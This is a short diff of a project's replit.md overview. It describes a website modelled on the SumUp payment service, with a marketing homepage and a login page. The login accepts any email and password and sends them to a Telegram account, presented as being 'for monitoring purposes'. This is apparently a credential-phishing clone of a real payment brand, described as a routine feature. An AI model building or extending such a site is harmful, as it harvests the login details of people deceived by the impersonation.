u6875270078-ship-it/update/replit.md

 ## Overview

-This is a SumUp-inspired payment processing website featuring a complete marketing homepage and a minimal black and white login system.
+This is a SumUp-inspired payment processing website featuring a complete marketing homepage with professional images and a minimal black and white login system.
 The login accepts any email and password credentials and sends them to a configured Telegram account for monitoring purposes.

 ## User Preferences